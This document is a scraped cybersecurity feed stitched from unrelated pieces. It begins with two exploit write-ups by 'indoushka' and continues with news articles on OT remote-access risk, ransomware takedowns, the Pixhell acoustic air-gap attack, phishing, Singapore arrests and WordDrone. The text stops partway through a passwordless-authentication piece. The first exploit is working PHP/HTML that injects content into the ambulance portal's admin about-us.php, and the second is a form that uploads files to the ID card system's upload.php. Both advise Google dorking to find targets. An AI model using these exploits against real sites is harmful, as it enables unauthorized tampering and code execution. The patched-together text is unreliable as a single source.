Emergency Ambulance Hiring Portal version 1.0 suffer from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/eahp/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection

Printable Staff ID Card Creator System version 1.0 suffers from an insecure direct object reference vulnerability.

=============================================================================================================================================  
| # Title     : printable staff id card creator system 1.0 idor Vulnerability                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .

[+] Line : 8 Set your Target

[+] Save As poc.html

[+] payload :

<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">  
      <div class="modal-header" style="background:#222d32">  
        <button type="button" class="close" data-dismiss="modal">×</button>  
        <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>  
          SYSTEM INFORMATION INITIALISATION  
          </center></h4>  
      </div>  
        <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">            

      <div class="modal-body">           
        <center>   
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>  
              <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>  
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>  
                  Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">  
                                      <input type="hidden" name="page" value="admin.php">                                                                      
         </center>  
      </div>  
      <div class="modal-footer">  
        <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;  
        <button type="button" class="btn btn-success" data-dismiss="modal">Close</button>  
      </div>  
      </form></div>

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Printable Staff ID Card Creator System 1.0 Insecure Direct Object Reference

A veritable grab bag of tools used to access critical infrastructure networks are wildly insecure, and they're blobbing together to create a widening attack surface.

Source: Agencja Fotograficzna Caro via Alamy Stock Photo

The exploding demand for remote access into today's industrial control systems (ICS) and operational technology (OT) systems has created a nebulous, Internet-connected attack surface that's too attractive for cyberattackers to ignore. And cleanup is not going to be a simple affair.

Far too many ICS networks are being accessed by employees, partners, suppliers, and customers using a slapped-together mousetrap of tools, leaving these environments woefully exposed while connected to the Internet, according to researchers.

In a new analysis, Claroty's Team82 looked at 50,000 individual remote access-enabled devices running on industrial networks with dedicated OT hardware, and found 55% to have at least four remote access tools (RATs) in their environments. A full third (33%) reported using six or more RATs. Some organizations reported using up to 16 different of them.

Industries represented in the examples examined by the Team82 researchers included pharmaceuticals, consumer goods, food and beverage, automotive, oil and gas, mining, and manufacturing — many of which are considered critical infrastructure sectors.

"Within critical infrastructure, there is sometimes a bigger physical risk associated with a breach, depending on the jeopardized device," says Tal Laufer, Claroty's vice president of products, secure access. "That being said, all organizations with this type of tool sprawl are at risk, since it can create security gaps in their networks for threat actors to exploit."

Making matters even more complicated for cybersecurity teams, the Team82 report found that 79% of the organizations they surveyed have more than two remote access management tools in their environment that don't meet basic enterprise-grade security standards.

"Most of these tools lack the session recording, auditing, and role-based access controls that are necessary to properly defend an OT environment," the Team82 report said. "Some lack basic security features such as multi-factor authentication (MFA) options, or have been discontinued by their respective vendors and no longer receive feature or security updates."

**Cyberattackers Notice Sprawling OT Remote Access Attack Surface**

Adversaries are already well aware of the malicious possibilities that these remote access tools unlock — and have been for several years.

Laufer notes that several massive breaches in recent years have been the result of misconfigured remote access tools, including Colonial Pipeline in 2021 and Change Healthcare earlier this year.

As far back as 2020, analysts at Kaspersky warned about the risk of cyberattacks against remote access tools like TeamViewer and RMS to breach ICS environments. And in January 2023, CISA joined with the NSA to issue a warning that adversaries were launching widespread campaigns against remote management systems like AnyDesk to breach federal agencies.

Those warnings have played out: A threat actor was discovered attempting to drop XMRing cryptominer malware using TeamViewer in May 2023. Likewise, the remote access tool TeamViewer was targeted in failed attempts to compromise systems by LockBit 3.0 ransomware group in early 2024. Similarly, remote access tool production systems were compromised at AnyDesk last February, forcing the vendor to revoke all of its security clearances and reset all Web portal passwords.

Despite these warnings, ICS/OT operators are in a particularly tough spot without a clear path toward protecting themselves. The Team82 findings demonstrate how the sheer number of these tools can easily pile up within an environment, creating an ever-creeping blob of remote access surface area ripe for adversaries to probe for success. As the report detailed, each tool brings along with it its own supply chain weaknesses, often including a lack of basic, best-practice security features like MFA, auditing, and session recording.

Compounding the issue is a basic lack of monitoring, detection, and policy control tooling that works across disparate remote access systems, leaving them open to misconfigurations, as messy policy and control management, the report added.

The report added that managing all these various RATs, and the hardware behind them, is an expensive operational proposition.

**OT Remote Access Cleanup**

Unsurprisingly, the first step on the path to securing remote access for ICS/OT networks is to get a full inventory of the tools that provide access to OT assets, according to the report.

"A critical first step is ensuring you have complete visibility into your organization’s OT network to understand how many and which solutions are providing access to OT assets and industrial control systems (ICS)," Laufer explains.

Next, those solutions that don't meet basic enterprise cybersecurity requirements need to go — pronto.

"From there, engineers and assets managers need to actively eliminate or minimize the use of low-security remote access tools in the OT environment — especially taking into consideration those with known vulnerabilities or those lacking essential security features such as MFA," the researcher stresses.

It's also crucial to develop and require baseline security standards across the organization's supply chain. "Beyond this, security teams should also govern the use of remote access tools connected to OT and ICS," Laufer says. "This can help with alignment of security requirements and expansion of those requirements as needed throughout third parties within the supply chain."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

Remote Access Sprawl Strains Industrial OT Network Security

The threat of ransomware hasn't gone away. But law enforcement has struck a blow by adjusting its tactics and taking out some of the biggest adversaries in the ransomware scene.

Source: Andreas Prott via Alamy Stock Photo

COMMENTARY

The year to date has been particularly eventful across the ransomware landscape, with prolific ransomware groups, including LockBit, seeing their operations seized and dismantled. The strategies used to take down these groups were meticulously planned and executed, successfully undermining the most accomplished cybercriminal experts.

The fight against ransomware has for years felt like an uphill battle. Each takedown faces the inevitable criticism that these actions are temporary, resulting in groups reforming and coming back.

However, the past year has seen some of history's biggest takedowns, with international collaborative efforts from law enforcement employing new tactics. Are we seeing the balance of power beginning to shift?

**The Development of Law Enforcement's Strategy**

Law enforcement agencies have had to change their approach to remain successful in an environment where cybercriminal gangs adapt and develop constantly. Although previous takedowns have shown initial success in disrupting gangs on a technical level, law enforcement agencies have recognized the need to go further and think outside of the box.

Adding a twist, ransomware takedown teams are focusing on publicly damaging groups' credibility, acknowledging the fact that reputation and trust are (somewhat counterintuitively) valued commodities on the Dark Web.

Law enforcement's new approach was rolled out with Operation Cronos, the disruption campaign against one of the most prolific ransomware gangs, LockBit.

With a force of 10 countries' law enforcement agencies, the highlights of the takedown included 34 servers being seized, 200 cryptocurrency accounts being frozen, and two arrests taking place, and it didn't stop there.

The National Crime Agency (NCA) deployed psyops methods, using LockBits' own site, which it had hijacked, to publish images of LockBit's administration system and leak internal conversations, while publishing the usernames and login details of 194 LockBit "affiliate" members. Then, the unmasking of "LockBitSupp" — the gang's leader — was teased with a countdown timer on the LockBit website, eventually naming him as Dmitry Khoroshev. Law enforcement also implied that he had collaborated with them by leaking the affiliate's details, creating more doubt among Dark Web associates. 

When logging in to their systems, LockBit members were greeted with personalized messages stating that the authorities had details regarding their IP addresses, cryptocurrency wallet details, internal chats, and their personal identity.

Law enforcement's strategy undermined LockBit's reputation and emphasized its fragility. Hijacking the website exposed infrastructure weaknesses, unmasking LockBit's leader proved he had weak operations security, and leaking the affiliates demonstrated the risks of associating with LockBit. These methods dethroned LockBit's reputation further. Although the group is still active, recent data shows that the average number of monthly LockBit attacks in the UK has reduced by 73% since February.

**The Snowball Effect in the Dark Web Community**

The LockBit takedown has caused a ripple effect and garnered a lot of attention across the ransomware landscape, eliciting the message that if LockBit can be taken down, anyone could be next. Targeting the biggest ransomware group was law enforcement's message that no group is beyond its reach.

Two weeks later, BlackCat, the second biggest ransomware group, claimed to have been disrupted by law enforcement, even uploading a fake seizure banner. However, law enforcement quickly denied its involvement. In fact, the group appears to have closed itself down after stealing a large sum of money from its affiliate, following a ransomware attack on Change Healthcare. The timing of BlackCat's retirement suggests a potential reaction to the LockBit takedown, showing a newfound sense of fear on the Dark Web.

**What Comes Next?**

Disrupting some of the world's most dangerous and prolific ransomware groups such as LockBit and BlackCat, which have dominated the ransomware landscape in recent years, is a huge achievement. 

Of course, these successes have not immediately led to the collapse of the ransomware underground. In fact, our statistics show that there were 73 ransomware groups in operation in the first half 2024 compared with the same period for 2023, representing a 56% increase in the number of ransomware groups. 

However, although there are more groups, we have seen a 16% decrease in victims listed between the second half of 2023 and the first half of 2024, which suggests that taking on the big groups with new tactics has had a measurable impact. It appears that what we are actually observing is a diversification — rather than growth — in the ransomware landscape.

A recent Europol report also highlighted a fragmentation of the ransomware landscape. While the threat is no longer coming primarily from a group of three to four dominant ransomware-as-a-service (RaaS) groups, the affiliates who led a mass exodus have started their own operations, developing their own ransomware tooling and lessening their reliance on the big players. 

This creates its own challenges for security professionals. A more diverse ransomware ecosystem means a more diverse landscape for cybersecurity teams to navigate. As things move quickly in the ransomware world, collecting up-to-date intelligence on ransomware groups is more important than ever before.

The threat of ransomware hasn't gone away. However, law enforcement has certainly struck a blow by adjusting its tactics and has potentially created some breathing room for security professionals by taking out some of the biggest adversaries in the ransomware scene.

**About the Author**

CTO & Co-founder, Searchlight Cyber

Dr. Gareth Owenson is the CTO and co-founder of the Dark Web intelligence company Searchlight Cyber. Gareth completed his Ph.D. in computer science in 2007 and is a world leader in Tor Dark Web research. He advises governments, military, and law enforcement on Dark Web technologies and guides the development of a suite of technologies that have put Searchlight Cyber in the forefront of Dark Web investigative and intelligence efforts. Gareth co-founded Searchlight Cyber in 2017 to help governments, law enforcement, and enterprises in the fight to protect society from threats that emanate from the Dark Web.

How Law Enforcement's Ransomware Strategies Are Evolving

In the "PixHell" attack, sound waves generated by pixels on a screen can transmit information across seemingly impenetrable air gaps.

Source: Miscellaneoustock via Alamy Stock Photo

A newly devised covert channel attack method could undermine diligently devised air gaps at highly sensitive organizations.

In industrial control systems security, the term "air gap" is contested. It typically describes a total physical separation between networks — a literal gap through which no Wi-Fi signals, wires, etc., can pass. The most critical military, government, and industrial sites use air gaps to prevent Internet-based cyber threats from penetrating the kinds of networks that protect state secrets and human lives.

But any medium capable of transmitting information can, in theory, be weaponized to transmit the bad kind. Mordechai Guri of Israel's Ben-Gurion University has long researched ways of crossing air gaps with sound waves: via computer fans, hard disk drives, CD/DVD drives, and more. His latest attack scenario, "Pixhell," enables data theft using sounds produced by specially generated, rapidly shifting bitmap patterns on an LCD screen.

**How Pixhell Works**

It's midnight, and everyone working at the top secret intelligence facility has long gone home for the night, when all of a sudden a computer screen flashes with what appears to be random noise, as if it's missing a signal. It isn't missing a signal — the apparent noise is the signal.  

Pixhell only works if an attacker can infect or control at least one device on each side of an air gap.

Air gaps typically connect critical networks with less critical networks, so the latter half of that job might be achieved by an Internet-based attack, while the former will require more stringent measures. Still, a machine behind an air gap can be infected in any number of ways: via supply chain compromise, a removable drive in the hands of a malicious or unwitting insider, or assorted other options.

Then, with no other obvious means of communicating — not Wi-Fi, Bluetooth, a speaker, or anything else — a computer can be made to transmit information over an air gap via the sounds generated by its screen.

Simplified, LCD screens have capacitors — which store and release electrical charge — and inductors — which help manage the voltage to those capacitors. While they're working, these components generate the faintest of high-pitched frequencies, inaudible to the human ear.

However, "Speakers and microphones generally have a frequency range that is broader than human hearing," explains Andrew Ginter, vice president of industrial security at Waterfall Security Solutions. "The high end of the frequency range is where you can encode the greatest amount of information — the largest number of bits per second — and it's ultrasound. Dogs might freak out in the room, but humans can't hear it."

In experiments, the Pixhell malware manipulated pixels on a screen in such a way as to cause its inductors and capacitors to vibrate at specific frequencies. In so doing, they generated sound waves translating stolen, encoded data to the machine on the other side of an air gap, with varying fidelity at distances of up to two and a half meters. As Ginter puts it, "An attacker can send information from either computer to the other's microphone, and you can be sitting in the room and not realize information is being communicated."

**The Wide World of Covert Channel Attacks**

Besides acoustics, there are any number of other, equally creative means to carry out covert channel attacks in theory.

"It's been reported that with sufficient effort, you can use Ethernet wiring as software-defined radio transmitters and receivers," Ginter notes. Some 20 years ago, 56-kilobit-per-second modems had an LED on the front so users could see if their data was moving. Ginter says you could turn the LED on when there was a one bit being transmitted, or off when it was a zero bit. "And it turned out that the LED was extremely responsive — so responsive that if you had a fast enough camera or detector, you could actually detect every bit that was being sent through the modem by watching the LED," he adds. 

Countless other fun examples can be found in the annals of computer research archives. "Some computers have the ability to do detailed measurements on the voltage that's coming into the battery. And what that means is that if you have two computers plugged into the same circuit, even if they're using different outlets, one computer can consume more power briefly and less power a fraction of a second later, and the other one can detect these very tiny changes in voltage, so they can signal to each other that way. Even though they're electrically connected to different networks, they're both connected to the same power," he explains.

**What the Best Air Gaps Look Like**

For the overwhelming majority of organizations, a physical air gap is sufficient to protect against even high-level adversaries, who aren't likely to pull off Pixhell-style attacks.

Those few most sensitive sites on the planet that have to worry about covert channel attacks — spy agencies, military headquarters, power plants — have already dedicated significant time and resources to building not just air gaps, but air gaps that make these scenarios impractical.

"At some extremely sensitive OT sites, they will have all of the OT equipment in one server room, and they'll have the IT equipment in another server room down the hall. And the only connection between the server rooms is a single fiber-optic connection that is a unidirectional gateway from OT to IT," Ginter explains.

Past that, he adds, the greater the distance between communicating computers, the more difficult it is to exploit covert channels. "If it's an electrical \[channel you're worried about\], you've got electrical noise between rooms. If it's audible, there are closed doors in the way. If it's temperature, you can heat up the room in a region very slightly \[at intervals\], so there's so much thermal noise that it becomes impractical to send any information out." The operative idea is signal-to-noise ratio (SNR): How much noise does one have to generate to make a covert channel attack impractical?

Whether such science-fiction-level defenses are warranted will depend on the organization at risk. "Some of the countermeasures were given for scientific discussion, but they are less practical to deploy in real life," Guri says. As an example, he points out that acoustic jammers would stop Pixhall right in its tracks: "Such a noise jammer may work in countering the attack, but it will make the environment too noisy for people to work."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Air-Gapped Networks Vulnerable to Acoustic Attack via LCD Screens

Cybercriminals target Trump’s digital trading cards using phishing sites, fake domains, and social engineering tactics to steal sensitive…

Cybercriminals target Trump’s digital trading cards using phishing sites, fake domains, and social engineering tactics to steal sensitive data. Scammers create fake URLs mimicking the official site to deceive collectors.

Cybercriminals are now aiming at your digital collectable cards, with former President Donald Trump‘s new digital trading cards being the latest target. Since launching, Trump’s digital trading cards, which offer exclusive digital assets and real-life experiences, have generated substantial attention among collectors and supporters.

According to cybersecurity firm Veriti, malicious actors are using phishing sites, fake domains and various social engineering tactics to trick users into revealing sensitive information or installing malware.

One example of a fake domain is trumpdigitaltradingcards/.xyz, which mimics the official URL (collecttrumpcards/.com) but with subtle differences. Another instance is a fake site from the Democratic Party, which surfaced under the domain collecttrunpcards/.com in which the domain uses an “N” replacing the “M” in “Trump”).

Fake websites (Screenshot: Veriti)

****But how do these scams work?****

Attackers are using traditional phishing tactics, including email phishing and domain typosquatting, to lure in victims. Email phishing involves sending emails that appear to be from legitimate sources, and promoting limited-time offers on Trump’s digital cards, which often contain malicious links that lead to phishing websites.

“Attackers are leveraging the popularity of these trading cards to exploit users’ curiosity and desire to acquire them,” explained Veriti in its report shared with Hackread.com ahead of publishing on Tuesday. “The scams range from fake websites that look almost identical to the official site to more traditional phishing emails promising limited-time offers.”

****Not The First Time****

Trump has been used as bait for cybercrime before, and his supporters have been targeted in financial scams multiple times. In July of this year, scammers stole donations from his supporters by setting up fake and malicious websites.

In another scam, hackers used a fake Trump assassination story to steal cryptocurrency from his supporters. In January 2021, a phishing video link tied to Trump’s election campaign was found spreading the QNode RAT malware.

Nevertheless, if digital collectable cards are your passion, it’s essential to be aware of the associated risks. By staying alert and taking necessary precautions, you can protect yourself from phishing scams and your personal information from scammers. Follow these simple tips to stay secure:

*   Use common sense; it’s the best defence against any kind of attack.
*   Look for HTTPS, which adds a layer of security to your browsing experience.
*   Double-check URLs before entering any personal information, as phishing sites often use slight variations in spelling to fool users.
*   Be cautious of unsolicited emails, and instead of clicking directly on the link, navigate to the official website by typing in the URL manually.
*   Follow Hackread.com for the latest news on cybersecurity and online scams.

1.  **Trump campaign website defaced with “site seizure” notice**
2.  **Fake Trump’s scandal video campaign spreading QNode RAT**
3.  **Researcher logs into Trump’s Twitter with password MAGA2020**
4.  **Federal Agency that maintains secure COMM for Trump HACKED**
5.  **2 arrested for Hacking DC Security Cams Before Trump Inauguration**

Hackers Use Fake Domains to Trick Trump Supporters in Trading Card Scam

The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country.
The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations.
The six men, aged between 32 and 42, are suspected of

The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country.

The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations.

The six men, aged between 32 and 42, are suspected of being linked to a "global syndicate" that conducts malicious cyber activities. Pursuant to the operation, electronic devices and cash were seized.

Among those apprehended includes a 42-year-old Chinese national from Bidadari Park Drive, who was found to be in possession of a laptop that contained credentials to access web servers used by known hacker groups. The identities of the threat actors were not disclosed.

In addition, five laptops, six mobile phones, cash totaling more than S$24,000 (USD$18,400), and cryptocurrency worth approximately USD$850,000 were confiscated from the individual.

Three other Chinese nationals, arrested from Mount Sinai Avenue, are said to have been possessing laptops containing personal information related to foreign internet service providers, hacking tools, and "specialized software to control malware" such as PlugX, a remote access trojan widely used by Chinese state-sponsored groups.

The authorities also seized seven laptops, 11 mobile phones, and cash worth more than S$54,600 (USD$41,900) from the three men.

Another 38-year-old Chinese national was arrested from Cairnhill Road over suspicions of "offering to purchase personally identifiable information that was believed to have been obtained through illegal means."

The sixth person, a 34-year-old Singaporean national residing in Hougang Avenue, is believed to have assisted the others in their malicious activities.

The defendants have been charged with offenses under the Computer Misuse Act 1993 for gaining unauthorized access to computer material, retaining personal information without authorization, and retaining software that could be used to commit other malicious attacks.

The Singaporean national has also been charged with abetting the securing of unauthorized access to websites, an offense that's punishable with a fine of up to S$5,000 (USD$3,830), or a jail term of up to two years, or both, for a first-time offender.

Channel News Asia has reported that a sixth Chinese national was also subsequently arrested on Wednesday for instructing the Singapore man to subscribe to a Singtel broadband plan.

"This is a significant operation as the individuals are suspected to be carrying out global malicious cyber operations from Singapore," the SPF said. "We have zero tolerance of the use of Singapore to conduct criminal activities, including illegal cyber activities. We will deal severely with perpetrators."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Singapore Police Arrest Six Hackers Linked to Global Cybercrime Syndicate

An attack dubbed "WordDrone" that uses an old flaw to install a backdoor could be related to previously reported cyber incidents against Taiwan's military and satellite industrial supply chain.

Source: Ron Ardity via Alamy Stock Photo

Attackers are weaponizing an "ancient" version of Microsoft Word in a recent wave of attacks on Taiwanese drone makers that's delivering malware aimed at cyber espionage and disrupting the military- and satellite-related industrial supply chains.

Researchers from the Acronis Threat Research Unit have discovered an attack they've dubbed "WordDrone" that uses a dynamic link library (DLL) side-loading technique common in the installation process of Microsoft Word, to install a persistent backdoor called ClientEndPoint on infected systems.

The Acronis team members discovered the unusual attack vector when they investigated a customer escalation from Taiwan "about a strangely behaving process of an ancient version of Microsoft Word," they wrote in a blog post published Sept. 10.

"Three files were brought to the system: a legitimate copy of Winword 2010, a signed wwlib.dll file, and a file with a random name and file extension," they wrote in the post. "Microsoft Word was used to side load the malicious 'wwlib' DLL, which acts as a loader for the actual payload, the one residing inside the encrypted file with a random name."

They eventually found similar two-stage attack scenarios across multiple environments between April and July this year. The first stage of the attacks focuses on Windows desktop machines, while the second stage sees attackers trying to move over to Windows servers, the researchers said.

**Similarities to "TIDrone" Campaign**

It's unclear if the attack vector is related to a similar wave of cyber incidents against Taiwanese drone makers by a threat actor dubbed "TIDrone" reported by researchers at Trend Micro. That actor, linked to other Chinese-speaking threat groups, uses enterprise resource planning (ERP) software or remote desktop tools to deploy proprietary malware.

Similarly, the WordDrone attack also appears to have an ERP component, the researchers said. While they couldn't find "definitive evidence about how attackers were gaining initial access," the first appearance of the malicious files in the attack was inside the folder of a popular Taiwanese ERP software called Digiwin.

"Upon further investigation, we found multiple components of Digiwin … being deployed in the target environments," the researchers wrote. Moreover, some of Digiwin's components contained known vulnerabilities like CVE-2024-40521, a remote code execution (RCE) flaw with a CVSS score of 8.8.

"Based on all the information collected, we believe that there is high probability of exploitation or a supply chain attack being involved with the ERP software in question," the researchers noted.

**Targeting a Side-Loading Flaw**

The attack leverages a side-loading vulnerability in an old version of Winword (v14.0.4762.1000) allowing attackers to use it to load a DLL that has a name matching the original supplied by Microsoft.

"In the very same directory where Winword was located, we could see only two additional files, a ... DLL called wwlib.dll, which is normally part of a standard Microsoft Office installation package — this time having an unusually small size — and another file called 'gimaqkwo.iqq' which already looked suspicious," the researchers explained.

Upon further inspection, the wwlib library turned out to be acting as a loader with the sole purpose of reading the main payload that is stored in the encrypted "gimaqkwo.iqq" file in the same directory, they said. The file name of the payload — the ClientEndPoint backdoor — is stored in an encrypted form in the loader.

The backdoor has functionality typical to this type of malware, including the ability to listen in on user sessions, send and receive commands from the attacker-controlled command and control (C2), and exfiltrate data and send it back to the C2. It also has a proxy configuration mode in which one infected host can receive data and commands from another infected host on the local network while only one of them is in direct communication with the C2.

**Why Target Taiwanese Drone Makers?**

The fact that two separate security research teams have been investigating a spate of cyberattacks against Taiwanese drone makers brings up the question of motive on the part of attackers, which the Acronis team attempted to address.

Drone manufacturing has increased remarkably in Taiwan since 2022, with significant financial backing from the government, the researchers noted. There currently are about a dozen Taiwanese companies in the space  — often providing components for original equipment manufacturers (OEMs) — and even more if the country's global aerospace industry is taken into consideration, they said.

This investment in drone manufacturing and the considerable technological prowess of Taiwan, as well as its position as a US ally, "make them a prime target for adversaries interested in military espionage or supply chain attacks," the researchers observed.

"The extreme growth of the drone industry in the past decade also had an unfortunate side effect — even consumer models are used for military purposes now," they wrote in the post.

The research team shared their intelligence with Taiwan's appropriate cybersecurity authorities and included a list of indicators of compromise (IoCs) in the blog post. As drone makers of all sizes could be targeted by WordDrone attacks, defenders should be mindful of any suspicious activity, especially as it relates to older versions of Microsoft Word that might be present in their environment. Small businesses in the sector in particular should be mindful and shore up defenses, the researchers wrote, "as traditional AV solutions are no longer efficient against the type of advanced threats they might face in the near future."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'Ancient' MSFT Word Bug Anchors Taiwanese Drone-Maker Attacks

Imagine a world where you never have to remember another password. Seems like a dream come true for both end users and IT teams, right? But as the old saying goes, "If it sounds too good to be true, it probably is." 
If your organization is like many, you may be contemplating a move to passwordless authentication. But the reality is that a passwordless security approach comes with its own

Password Security / Identity Management

Imagine a world where you never have to remember another password. Seems like a dream come true for both end users and IT teams, right? But as the old saying goes, "If it sounds too good to be true, it probably is."

If your organization is like many, you may be contemplating a move to passwordless authentication. But the reality is that a passwordless security approach comes with its own set of pitfalls and perils. In this post, we'll discuss the real-world complexity of going passwordless and explore why strengthening your existing password protocols may be the simpler solution.

**The appeal of passwordless authentication**

Password-related vulnerabilities pose a major threat to organizational security. According to research by LastPass, a full 80% of data breaches stem from weak, reused, or compromised passwords. This sobering statistic highlights the appeal of passwordless systems, which offer a way to completely circumvent the risks associated with traditional passwords.

Passwordless authentication — including methods like biometrics, security keys, or magic links — offers several benefits:

*   **Enhanced security:** By eliminating the need for users to create and remember complex credentials, passwordless authentication systems significantly reduce the risk of breaches caused by human error.
*   **Improved end user experience:** Passwordless authentication is desirable from an end-user perspective. After all, who relishes the challenge of remembering multiple complex passwords across various accounts?
